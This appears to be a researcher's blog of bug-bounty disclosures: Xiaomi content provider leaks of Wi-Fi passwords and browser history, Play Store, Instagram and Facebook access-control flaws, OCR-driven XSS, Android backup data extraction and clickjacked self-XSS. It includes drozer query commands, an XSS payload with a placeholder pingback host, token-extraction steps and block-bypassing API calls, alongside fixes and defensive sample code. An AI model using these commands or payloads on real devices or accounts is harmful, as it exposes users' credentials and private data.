Disclosing wifi password via content provider injection in Xiaomi


Saved Wi-Fi passwords on Android are stored under /data/misc/wifi, a directory that can only be accessed with root. So in general you cannot list or read anything under /data unless you have root access or the files are world readable/writable.

Device used:

(Xiaomi Redmi Note 7 Pro, Android 9)

➜ appreview adb shell getprop | grep -E "ro.miui.region|ro.build.fingerprint"
[ro.build.fingerprint]: [xiaomi/violet/violet:9/PKQ1.181203.001/V10.3.13.0.PFHINXM:user/release-keys]
[ro.miui.region]: [IN]

Poc steps:

Connect the device and run the drozer command below; it dumps the Wi-Fi passwords in cleartext along with other details.

run app.provider.query content://wifi/wifi


Recommendation: don't export the content provider containing user information. Protect it via custom permissions, or store the data in encrypted form.


Impact: any app on the device can query this provider and fetch the Wi-Fi credentials. The system does not permit this by default, since reading the stored passwords requires a rooted device, but here they are easily available. A malicious app can use them to log in to the victim's router and alter its DNS settings, which will disclose the user's browsing activity to the attacker.

Disclosure Timeline

Reported on Jul 18th 2019
Triaged on Jul 18th 2019
Fix reviewed and ticket closure on Sep 11th 2019

Missing access control at play store


The Google Play Store developer account has an invite feature that allows the admin user to invite other colleagues/developers to manage the account as well as app releases. With this issue, an invited user with limited permissions was able to see the information of other apps as well, which the account owner had not permitted.

Steps to reproduce:

1.) Log in to https://play.google.com/apps/publish/ as owner A using Chrome.
2.) From A's account visit Settings > Developer account > Users & Permissions.
3.) Send an invite to user B with read-only permissions.
4.) Click the invite link and log in to B's account using Firefox.
5.) From A's account change user B's permissions and restrict its visibility to one app with read-only permissions.
6.) Refresh from B's account: B will only be able to see the one app permitted by user A on the dashboard and cannot see the other listed apps.
7.) To bypass this check, just visit this URL from B's account
8.) where 5765075562513459389 is the account id, which will be there by default, and com.dummiesguideto.indiantrain is the package name of the app.
9.) Now user B is able to view the information of other apps present in A's account, despite A having applied the restricted view of apps for user B.

Video Poc

17-April-2018-Fixed and Bounty rewarded.
5-Sept-2018-Granted permission for public disclosure.

Thank you for reading 🙂

Content provider injection in Xiaomi stock browser

Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones was vulnerable to content provider injection, through which any third-party application could read the user's browser history.

Vulnerable component:

Drozer command:
run app.provider.query content://com.android.browser.searchhistory/searchhistory

Poc Image:


Fixing Timeline:

  • Reported to Xiaomi team on 2018-11-24
  • Bug reproduced by the team and fixed in the newer version.
  • Fix verified on 2018-12-27
  • CVE-2018-20523 assigned




Hi Readers,

Optical Character Recognition (OCR) is the process of electronically extracting text from images or documents such as PDFs and reusing it in a variety of ways: full-text search, invoice processing, document verification etc. This becomes harmful, as is obvious, when the extracted text is used somewhere within the application or reflected back without validation.

So we just need to prepare an image containing our XSS vector; if the parser extracts it and reflects the output to users, it leads to XSS.

I will take a simple jpg as an example.

You can create an image like that from here.


I am using tesseract for OCR along with a simple Flask server which accepts the image as input, parses it and reflects the extracted content back to the admin or another user. You can find the code here.

  1. To start, run python ocr.py
  2. Now visit the local server
  3. Upload the above file
  4. Now visit /admin/ocr/files
  5. You will see the alert

Similarly, create an image with the tag or a blind XSS payload to confirm a pingback to your local server.


Different parsers react differently to some characters. For example, tesseract treats a forward slash "/" as "l", so when you put http:// it becomes http:/l, which won't work in the browser; for that reason I am using backslashes. Likewise, we have to figure out the quirks of other parsers too.

Here I am using ngrok.io just to confirm the ping; you can use Burp Collaborator or any other tool. So create your image with this content, upload it and see if you get any hits.


If you are using OCR services, sanitize not only the filename but also the text extracted from the image or PDF before storing it in the DB.

Once you upload an image, check the response to see whether the contents of the image are also reflected. If yes, it is possibly being used somewhere, and if there is no check on how the output text is reflected it can lead to XSS, especially in apps that use OCR services.
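As an added example (not the ocr.py from the post), here is the vulnerable reflection pattern beside its hardened form, plus the sanitize-before-store step; a constructed string stands in for real tesseract output, and attacker.invalid is a placeholder host:

```python
import html
import re

# Constructed stand-in for text an OCR engine might extract from an uploaded
# image (not real tesseract output). An image carrying markup like this is the
# case described above.
SAMPLE_OCR_TEXT = 'Invoice 4711 total 42.00 <img src=x onerror=alert(1)>'

# Blind variant: the post explains tesseract reads "/" as "l", so the pingback
# URL is written with backslashes (attacker.invalid is a placeholder host).
SAMPLE_BLIND_TEXT = r'Ref 9 <script src=http:\\attacker.invalid\x.js></script>'

CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def sanitize_for_storage(extracted: str, max_len: int = 4000) -> str:
    """Step 1 (before the DB write): drop control characters and cap length.
    This does NOT make the text safe for HTML; that is render_safe's job."""
    return CONTROL_CHARS.sub("", extracted)[:max_len]


def render_unsafe(stored: str) -> str:
    """The vulnerable pattern from the post: OCR output dropped straight into
    the /admin/ocr/files page, so the tag inside the image runs for the admin."""
    return f"<li class='ocr-result'>{stored}</li>"


def render_safe(stored: str) -> str:
    """Hardened: escape at output time so the OCR text is displayed, never parsed."""
    return f"<li class='ocr-result'>{html.escape(stored, quote=True)}</li>"


def looks_like_markup(stored: str) -> bool:
    """Cheap detection signal for logging/alerting: does the OCR text contain tags?"""
    return re.search(r"<\s*/?\s*[a-zA-Z][^>]*>", stored) is not None


if __name__ == "__main__":
    for text in (SAMPLE_OCR_TEXT, SAMPLE_BLIND_TEXT):
        stored = sanitize_for_storage(text)
        print("markup in OCR output:", looks_like_markup(stored))
        print(render_safe(stored))
```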

So next time you see an application asking for KYC, uploading scanned documents, a passport-size photo or document verification, you can mess around with it.

Hope it helps, thanks.

Finding backup vulnerabilities in android apps

Hi everyone, this post is just an elaboration of the 10th point I made in my previous post, which is often missed by devs/hunters looking for bugs in Android apps. The issue is not new, and it is more a misconfiguration than a vulnerability.

Why backup?  

Just like any other OS, Android allows a user to make a backup of their apps. That's cool, but from our end we are concerned with whether any sensitive information is leaked in the backup and whether it has been loosely configured.

Tools Required?

  1. Adb
  2. Abe
  3. Apktool
  4. Genymotion

How to proceed : 

  1. To check whether an app allows backup, you first need to reverse the apk and find the manifest file. To do so execute apktool d <app-name.apk>
  2. Check in the AndroidManifest.xml file for the attribute
    android:allowBackup="true". If this is present and its value is set to true, it means we can back up the app's internal data, which resides under
  3. To back up the app, run adb backup -f <backup-name.ab>
  4. Accept the backup confirmation on the device.
  5. Now you will have the app-backup.ab file in your working directory.
  6. To read it you need to convert this .ab file into .tar format using the tool
    Android Backup Extractor
    Command: java -jar abe.jar unpack app-backup.ab
  7. Then you can extract this tar file using tar xvf app-backup.tar
  8. To make this process short, I have written a custom tool, pentdroid, which automates all the above Android operations.
  9. Just select operation 6 for reversing an app, 4 for taking a backup of an app, then finally option 5 to convert backup.ab into backup.tar.
  10. Once you get the .tar file, extract it using WinRAR.
  11. Once it has been extracted you will get the folder that resided in the /data/data directory.
  12. Explore the various files, including assets like .db and sharedprefs .xml files, and search for sensitive information; sometimes you will find developer secrets, passwords, auth tokens for APIs etc.
  13. Here I got one such case while reporting to one of the Android programs, where I was able to obtain an auth token stored in one of the .db files (screenshot: auth_token_exposed).
  14. I have used SQLite browser to see the contents of the .db files.
  15. Using the obtained token we can make calls to the API endpoint to fetch more information.
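As an added example (not pentdroid's code), here is a small Python checker for the two review steps above: reading android:allowBackup from a decoded manifest and flagging credential-looking keys in an unpacked shared_prefs file. Both inputs are constructed samples, and the package name and token value are placeholders:

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample of a decoded AndroidManifest.xml (what apktool d produces);
# not taken from any real app.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.hypothetical">
  <application android:label="Demo" android:allowBackup="true">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""

# Constructed sample of a shared_prefs XML file as found in the extracted
# backup; the token value is a fake placeholder.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">alice</string>
    <string name="auth_token">PLACEHOLDER-TOKEN-VALUE</string>
    <boolean name="onboarding_done" value="true" />
</map>"""


def backup_allowed(manifest_xml: str) -> bool:
    """True if adb backup may include the app's private data.
    android:allowBackup defaults to true when absent, so a missing attribute
    is treated exactly like an explicit "true"."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        return False
    value = app.get("{%s}allowBackup" % ANDROID_NS, "true")
    return value.strip().lower() == "true"


# Key names that usually hold credentials in shared prefs / sqlite dumps.
SENSITIVE_KEY = re.compile(r"(token|secret|passw|api[_-]?key|session|auth)", re.I)


def find_sensitive_prefs(prefs_xml: str) -> list:
    """Return (key, value) pairs whose key name suggests a credential."""
    hits = []
    for node in ET.fromstring(prefs_xml):
        key = node.get("name", "")
        if SENSITIVE_KEY.search(key):
            hits.append((key, node.text or node.get("value", "")))
    return hits


if __name__ == "__main__":
    print("allowBackup effective:", backup_allowed(SAMPLE_MANIFEST))
    for key, value in find_sensitive_prefs(SAMPLE_PREFS):
        print("sensitive pref %r = %s..." % (key, value[:8]))
```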

Why bother about this if we can find the same by just rooting the device?
With this, you don't need a rooted device to obtain data from an app's internal directory, and it respects program scope too, compared with the other OWASP-M2 issues which require you to have a rooted device.

Any Patch or recommendation?

1.) Try to implement SQLCipher, which encrypts the SQLite DB; check out http://lomza.totem-soft.com/tutorial-add-sqlcipher-to-your-android-app/

2.) Set android:allowBackup="false" within the Android manifest file to disallow the access.

3.) Do not let apps upload backups containing sensitive info in cleartext to the cloud either.






Mobile app security : Bugs which are actually counted

This post is just a few thoughts on VAPT and on security programs for mobile apps; it is not about mobile OS security, malware research or reverse engineering.

Mobile app security is a buzzword these days, and it is quite tangled and contradictory in itself. After the arrival of IoT it became even more important to assess your apps to prevent attacks against these systems, but in reality the major culprit has always been the web services running in the background (REST in peace). So the question is: who are we actually pentesting, the API or the mobile app? And if it's the API, then we are only doing the same Burp kind of stuff we used to do on the web, so
what is actual mobile app security?

Just imagine for a while: who will hand over his/her own iPhone 6 or Android device, jailbroken at that, so you can find something in plaintext in a plist? Seriously?

There are too many protection levels within the system to prevent exploitation itself, and infosec guys while reporting are like:

Hi team,
Here is an insecure local storage flaw; imagine that the device has been stolen, rooted and jailbroken.
I dare you to say that in the case of iOS.

(okay, just modify it: *we have physical access to the device for a while*)

Rooting or jailbreaking a device will itself give you the highest privilege within the device, so there is no point in reporting insecure local storage (termed M2 in OWASP)
unless the data is stored with world-readable permissions on the sdcard.
Most companies won't give a damn if the app you tested was on a rooted/jailbroken device, and the twist is that the entire OWASP list was written with respect to the emulator, which comes pre-rooted.

Below are some knockouts on the face from programs regarding such flaws:
and half of the OWASP top 10 went off.


That's the reality of acceptance of app-based vulnerabilities: no doubt you will find those issues in any random app from the app store, but they won't have much impact.

I would rather prefer this path, sdcard/android/, instead of data/data.

So what are some accepted issues for mobile apps?

Ans: In general, any bug which has significant impact without requiring many privileges on the device, and better still if you can exploit it remotely, like code execution or web-view exploits (but I guess these WebKit issues are dead these days).

Try to pentest with the least privilege on an unrooted Android device.
(Now it sounds like your hands and legs are being tied up.)
The next thing you will ask is how to proceed and what is possible on an unrooted device. I will post about it, along with a few of my PoCs.

A few of the issues I worked on that helped me with Android, and which at least count for acceptance, are:

  1. Sensitive information like access_tokens leaked in logs during debugging.
  2. Fragment injection.
  3. Arbitrary code execution, but there are constraints in this too: you need world readable + writable permissions to overwrite the native libraries, and to execute it remotely you need MITM.
    And even after doing all that,
    the feeling is still "informative"; trust me, I was there 😛
  4. XXE: you are lucky if the app parses XML entities; you can try those apps which parse pdf, docx etc.
  5. Remote code execution via web-views (addJavascriptInterface()).
  6. Sensitive API calls and IDOR.
  7. Exported intents which are helpful in bypassing authentication or screens.
  8. Exported broadcast receivers, like making a phone call by passing params.
  9. Tapjacking at OAuth endpoints, just like the clickjacking issue on OAuth buttons in the web.
  10. Backup issues like android:allowBackup="true", which will help you make a backup of the app and explore the sensitive stuff in it.
  11. Exported components without custom permissions, including activities and receivers
    [which can also be bypassed].
  12. I consider SSL pinning should be here, but still, bug bounty programs will cry because it can be bypassed using Cydia Substrate, SSL killer or Xposed framework modules.

What about iOS?

  1. Some of the above issues are relevant to iOS too.
  2. iOS too has web-views which can be exploited, e.g. using file:// URIs, or to trigger FaceTime calls via improper URI schemes; this can allow attackers, for example, to send unauthenticated tweets and bypass popup blockers.
  3. Check the REST API calls again.
  4. Do traffic analysis.

So:
App-related issues found on a jailbroken device don't count unless you have a privilege escalation exploit on the device!

These are some of my own thoughts on mobile app sec, especially related to bug acceptance and feasibility of exploitation, and they are not intended to hurt anyone's feelings.

Thanks for reading guys and for being here 🙂
Let me know your thoughts in the comments.


Bypassing Instagram Block feature

Hello friends, it's been a while since I blogged; this time I am writing about one of my old issues. I was checking Instagram, and as a whitehat guy I went straight into testing its privacy/security measures. XSS, CSRF and OAuth issues were fixed and being hunted down by other folks 😛, so I was checking my favourite part, the API endpoints, and within a few hours I found 4 flaws with the API, i.e.

Pwning calls like GET, PUT, POST, DELETE

GET https://api.instagram.com/v1/users/{user-id}/media/recent

GET https://api.instagram.com/v1/media/<media_id>/comments/[comment_id]

PUT [the Instagram API uses few PUT calls; it uses POST for most update actions]

POST https://api.instagram.com/v1/media/{media-id}/likes

DELETE https://api.instagram.com/v1/media/{media-id}/likes

Attack -> Once any user1 blocks any other user2, user2 won't be able to see, like, share, post or comment on the victim's posts, or see who liked the victim's post, right? The same feature exists in Facebook.

Scenario:

The scenario is like this: someone is spamming your Instagram wall, posting abusive stuff on an image of yours which is very personal and which you don't like.
You now want him removed from your environment and want to keep yourself away from all that, so you have blocked me now.
You think the work is done, but no.
The attacker will try to find out what's going on with the image but he can't, because you have blocked him, so he cannot interact with your resources. But at the API endpoint there is a flaw: he will make those calls with the media id to like, dislike, see comments, see who liked your post, follow etc.

The interesting thing was that posting comments was restricted! It means the API is still performing some checks on some POST calls, except POST/DELETE /like, but not on GET calls.

The media_id can be easily figured out via the oEmbed feature in Instagram by just putting in the [url of resource], which lets you create embed code for the user's post.

Impact: The attacker was not able to perform any of the above actions from the UI endpoint but was able to bypass the block via the API endpoint with his own access_token. Now he can delete likes, create likes, see comments, see who liked the victim's post etc. in authenticated sessions, which violates the block functionality, isn't it?

Reason behind this?
The application was not verifying whether the access_token calls were coming from the original owner or from a blocked user; it was simply serving them.

Initial Instagram design flaw:
The root reason is the initial Instagram design. It is very open: it lets you see everything in unauthenticated sessions, whereas Facebook
has given users the choice of what they want to show or not show to outsiders [even in unauthenticated sessions]. So here, no matter what,
the application can only apply restrictions in authenticated sessions, because only then can it check whom to allow or whom to restrict.
When a user authenticates, Instagram performs only basic checks by hiding the controls and showing a non-interactive page to the blocked user,
but exploitation is possible from the API endpoint, which breaks the basic block function, isn't it?
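As an added example (not Instagram's code), here is a toy media API in which the block list is consulted only for the verbs named in `guarded`; with just "POST comment" guarded it reproduces the inconsistency described above, and with every verb guarded the API matches what the UI enforces. Users, media ids and verbs are constructed:

```python
ALL_VERBS = frozenset({"GET comments", "POST like", "DELETE like", "POST comment"})


class MediaApi:
    """Constructed toy model of the media endpoints; `guarded` is the set of
    verbs that consult the owner's block list before being served."""

    def __init__(self, guarded=ALL_VERBS):
        self.guarded = frozenset(guarded)
        self.owner = {}      # media_id -> owner user
        self.blocked = {}    # owner -> set of users the owner blocked
        self.likes = {}      # media_id -> set of users
        self.comments = {}   # media_id -> list of (user, text)

    def add_media(self, media_id, owner):
        self.owner[media_id] = owner
        self.likes[media_id] = set()
        self.comments[media_id] = []

    def block(self, owner, user):
        self.blocked.setdefault(owner, set()).add(user)

    def _allowed(self, verb, requester, media_id):
        if verb not in self.guarded:
            return True  # the flaw: this verb never asks whether the caller is blocked
        owner = self.owner[media_id]
        return requester not in self.blocked.get(owner, set())

    def call(self, verb, requester, media_id, text=None):
        """Dispatch one authenticated API call; returns (http_status, body)."""
        if media_id not in self.owner:
            return 404, None
        if not self._allowed(verb, requester, media_id):
            return 403, None
        if verb == "GET comments":
            return 200, list(self.comments[media_id])
        if verb == "POST like":
            self.likes[media_id].add(requester)
        elif verb == "DELETE like":
            self.likes[media_id].discard(requester)
        elif verb == "POST comment":
            self.comments[media_id].append((requester, text))
        else:
            return 404, None
        return 200, {"likes": len(self.likes[media_id])}


def blocked_user_statuses(guarded):
    """Victim 'owner' blocks 'spammer' after one abusive comment; return the
    status each verb gets for the blocked user afterwards."""
    api = MediaApi(guarded)
    api.add_media(1001, "owner")
    api.call("POST comment", "spammer", 1001, "abuse")
    api.block("owner", "spammer")
    return {v: api.call(v, "spammer", 1001, "again")[0] for v in sorted(ALL_VERBS)}


if __name__ == "__main__":
    print("only comments guarded:", blocked_user_statuses({"POST comment"}))
    print("all verbs guarded:   ", blocked_user_statuses(ALL_VERBS))
```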

[+] Fact: despite their patch I was again able to bypass the Instagram block 😛 so is there no need for a block feature then? Well, let them decide, now or in future; hopefully someone will ping them.


[13 April 2015] Reported this issue to the team
[14 April 2015] Better PoC provided with video
[16 April 2015] Got a reply asking for more info
[16 April 2015] Info provided
[21 April 2015] Changes were made, asked to confirm
[21 April 2015] Again reproduced the issue
[6 May 2015] Escalated to product team
[29 September 2015] Team is still working on a fix
[10 October 2015] Closed
[10 October 2015] Reopened again
[13 March 2016] Again escalated
[20 April 2016] Issue fixed by the team with no bounty

Changes Made By Team After the Report :

1.) Added a console for API documentation
2.) Added a sandbox approach
3.) Fixed the API and UI consistency

Now all the issues are patched at both endpoints, API and UI.


Deleting Facebook Event&Group cover pics

Hi Friends 🙂

Here is a small logical flaw with Facebook in the event and group corner.
The title should really be: deleting Facebook event & group cover pics via an image id reference flaw.

Facebook uses numerical ids to identify each object like video, url, feed, photos, events, groups etc. So I was checking the event corner and I found a logical flaw with image ids; I thought about the developer logic while building this.

Test: if any random invitee of the event posts a pic on the event wall, and later that pic is used by the admin of the event as the event cover pic, can we do anything malicious with it?

That's straightforward, but what could be wrong with this method? It's the right of an admin to utilize the assets of the event or the object he/she belongs to!

OK, let's dig deep. For that I first created 2 accounts: A, admin of the event, and B, a normal user.
Now I posted on behalf of user B, and from the admin account I tried to use that image as the event cover pic. I noticed that fb was assigning the same image id as it had assigned to the original poster B while posting it. So what?

Imagine now the original poster B is removed by the admin A from the event; now he doesn't have access to the assets like notes and pics of that particular event. He cannot interact with them or visit them, right?

But according to the Graph documentation, only the app that created a node has permission to delete it! So user B still has delete rights.

Now the exploitation: on triggering a DELETE request to that image id like
DELETE /736667463112529
via the Graph API the result was 200. Boom: now when the admin refreshes the page he will find that the event cover pic has also been deleted, due to the direct reference to the image id.

This flaw was in both Facebook events and groups. I reported it to Facebook under the category malicious use of functionality, however it was more of a logical flaw that is itself a vulnerability.

But the team was quick to acknowledge the report.

Now the issue has been fixed both from the client side as well as from the API side.

Fix in place: now Facebook generates a unique id for the photo whenever anyone tries to use it as a cover pic, instead of reusing the same id.
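As an added example (not Facebook's Graph API code), here is a toy object graph that shows why reusing the poster's photo id as the cover lets the original creator's delete right remove the cover, and how copying the photo into a fresh node owned by the event admin (the fix described above) closes it. Node ids start at a constructed value and the account names are placeholders:

```python
import itertools


class PhotoGraph:
    """Constructed toy object graph: every node has a numeric id and a creator,
    and, as with the Graph semantics quoted above, only the creator may delete it."""

    def __init__(self, copy_on_cover=True):
        self.copy_on_cover = copy_on_cover
        self._ids = itertools.count(1000)  # constructed starting id
        self.nodes = {}  # id -> dict(kind, creator, ...)

    def create_photo(self, creator):
        pid = next(self._ids)
        self.nodes[pid] = {"kind": "photo", "creator": creator}
        return pid

    def create_event(self, admin):
        eid = next(self._ids)
        self.nodes[eid] = {"kind": "event", "creator": admin, "cover": None}
        return eid

    def set_cover(self, event_id, photo_id, actor):
        event = self.nodes[event_id]
        if actor != event["creator"]:
            return 403
        if self.copy_on_cover:
            # Fix: the cover is a fresh node created by the admin, so the original
            # poster's delete right no longer reaches it.
            cover_id = next(self._ids)
            self.nodes[cover_id] = {"kind": "photo", "creator": actor, "source": photo_id}
        else:
            # Flawed design: the cover points at the poster's own photo id.
            cover_id = photo_id
        event["cover"] = cover_id
        return 200

    def delete(self, node_id, actor):
        node = self.nodes.get(node_id)
        if node is None:
            return 404
        if node["creator"] != actor:
            return 403
        del self.nodes[node_id]
        return 200

    def cover_visible(self, event_id):
        cover = self.nodes[event_id]["cover"]
        return cover is not None and cover in self.nodes


def scenario(copy_on_cover):
    """Invitee B posts a photo, admin A makes it the cover, B later deletes his
    photo. Returns (delete status, whether the event cover survived)."""
    g = PhotoGraph(copy_on_cover)
    event = g.create_event("admin_A")
    photo = g.create_photo("user_B")
    assert g.set_cover(event, photo, "admin_A") == 200
    return g.delete(photo, "user_B"), g.cover_visible(event)
```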

Here is a video PoC

cheers !


Exploiting unexploitable/self Xss

There are multiple endpoints where we can get XSS in web apps, but most of the time it is self-XSS 😛 which requires user interaction to trigger, so to make it exploitable or to build a PoC we are typically left with 2 options :p

  1. Using Clickjacking
  2. Using CSRF

Depending upon which of the above 2 cases is present we can create a PoC.

So here I will discuss a real example in one of the Yahoo acquisitions, "polyvore", which I reported.

There were multiple fields vulnerable to XSS. They were self-XSS, but the page was vulnerable to clickjacking, so we can exploit it by getting a relative XSS vector (to bypass the filter) into the fields with the help of the user, by tricking him into playing a drag and drop game.

This is at least better than a standalone PoC and will at least convey the issue to the team :v
I will create a separate post on how to do it via CSRF (no such fantasy involved in that either), but clickjacking involves a few configs, so this is just a bookmark post in case you run into such situations.

So I have just written a custom .py script which will create a clickjack-to-XSS PoC. On running the script it will ask you for 2 things:

  1. The XSS vector to bypass the filter
  2. The custom clickjack code, which you can create from here

Q.) Why custom clickjack code?

Because there are specific text fields/textareas which are vulnerable and need to be included as part of the game! You will understand better in the video below.

Now you can give this file to the victim!

PoC in action

Script

Greetz to #kotowicz for great work in the clickjacking domain.

That’s all guys 🙂

$ logout